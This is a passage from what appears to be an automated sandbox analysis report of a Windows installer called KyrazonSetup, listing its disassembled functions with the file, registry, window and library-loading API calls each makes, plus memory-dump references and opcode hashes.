                                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                        • Part of subcall function 0040558D: CreateDirectoryA.KERNELBASE(?,?,00485000), ref: 004055D0
                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,0047F000,00000000,00000000,000000F0), ref: 0040163C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID:
                                                                                      • API String ID: 1892508949-0
                                                                                      • Opcode ID: 063cade49b44451d63862b0b4acccae64b1b18f7fe3bcddbb7de98dadaaffedf
                                                                                      • Instruction ID: 4061ca9d70ae00be9bb4ad17465cac8f9754b7470a883fc3f2c2ead3154265c3
                                                                                      • Opcode Fuzzy Hash: 063cade49b44451d63862b0b4acccae64b1b18f7fe3bcddbb7de98dadaaffedf
                                                                                      • Instruction Fuzzy Hash: F0112731608152EBCF217BB54D419BF66B0DA92324B28093FE5D1B22E3D63D49429A3F
                                                                                      Function 00402473 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 54b3be57d36ca7f0d44e05a6551a7de4bb5a3a832c5f241bf52507b427e6b0ed
                                                                                      • Instruction ID: 77493b7c1caf9c0e8479f6492169629c84c06238e2a5328c90670a3d76b39679
                                                                                      • Opcode Fuzzy Hash: 54b3be57d36ca7f0d44e05a6551a7de4bb5a3a832c5f241bf52507b427e6b0ed
                                                                                      • Instruction Fuzzy Hash: BB11A371A01205FFDB15CF64DA9C9AEBBB49F11348F20843FE445B72C0D6B88A85DB69
                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 441e51a43d6905f91ce896fdb50f7f3e8ce2eecf8d4abbdd503ecf7d62571e05
                                                                                      • Instruction ID: 4cce14bbfac51e86deb9fb7f4f48f49e8063224b6fb315ffcb1e2fade37cb0f9
                                                                                      • Opcode Fuzzy Hash: 441e51a43d6905f91ce896fdb50f7f3e8ce2eecf8d4abbdd503ecf7d62571e05
                                                                                      • Instruction Fuzzy Hash: 1201FF316242209BE70A4B399D04B6A36D8F711729F10823FF851F72F1EA78CC028B4C
                                                                                      Function 00405199 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 004051A9
                                                                                        • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004051F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeMessageSendUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2896919175-0
                                                                                      • Opcode ID: a528ede16d8ece0c59ab40356331991896dac7d538e320d0ffb06345b870f253
                                                                                      • Instruction ID: d3bc7387fd57afad1243513bcccd471715f644c2d298f0249ad8164e4477d673
                                                                                      • Opcode Fuzzy Hash: a528ede16d8ece0c59ab40356331991896dac7d538e320d0ffb06345b870f253
                                                                                      • Instruction Fuzzy Hash: 43F0F073800B00ABE6005750DE00B1777A0DB82316F09443FFE84772E2CBB588018A6D
                                                                                      Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 08e1dd53f9dcbc9cf0071cf2efe72e77efb5ce36218b7302fcb677c7ad8d5d63
                                                                                      • Instruction ID: 3bb07fcd417830823528c6a07ea034e2eb3a780eb411924ff220aca0ca1a0825
                                                                                      • Opcode Fuzzy Hash: 08e1dd53f9dcbc9cf0071cf2efe72e77efb5ce36218b7302fcb677c7ad8d5d63
                                                                                      • Instruction Fuzzy Hash: 85E0ED72B04212AFDB14ABA5AA495AEB6A4DF40329B10443BE411B11D1DA7849419F5D
                                                                                      Function 00406338 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                        • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                                                        • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                                                                        • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 30985bc18176bda4dfc46ca2d396654736e9499ca8d22b71f2c1527f66d3312f
                                                                                      • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                                                                                      • Opcode Fuzzy Hash: 30985bc18176bda4dfc46ca2d396654736e9499ca8d22b71f2c1527f66d3312f
                                                                                      • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                                                                                      Function 00403739 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,74DF3410,00000000,00485000,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040375A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 1100898210-0
                                                                                      • Opcode ID: 7e46f2bbc1df1a916a08afdb92386b58c2c0976bbab61f5249e3d24e3d7a9f09
                                                                                      • Instruction ID: 6ba71519c43bf55b4b9167d4a70dfa8993af453660be5c9224fc6eec323f1fd3
                                                                                      • Opcode Fuzzy Hash: 7e46f2bbc1df1a916a08afdb92386b58c2c0976bbab61f5249e3d24e3d7a9f09
                                                                                      • Instruction Fuzzy Hash: FDE0127350212097C6216F59EE4875E7B786F85F22F05507AEA407B2608774AC428BD8
                                                                                      Function 00405B39 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                      • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                                      • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                      • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                                      Function 00405B14 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                                                      • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                                                      • Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
                                                                                      • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                                                      • Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98
                                                                                      Function 004036F4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\, xrefs: 00403713
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\
                                                                                      • API String ID: 2962429428-67779189
                                                                                      • Opcode ID: e2fce6cb7e4bd878bb855d9d4782e23046200841727912eee4ccc09af04f40ce
                                                                                      • Instruction ID: 8a34961e980c079ac6948eddad59adcae2d4cd7e0cdc6fd5433603b066ad1ffd
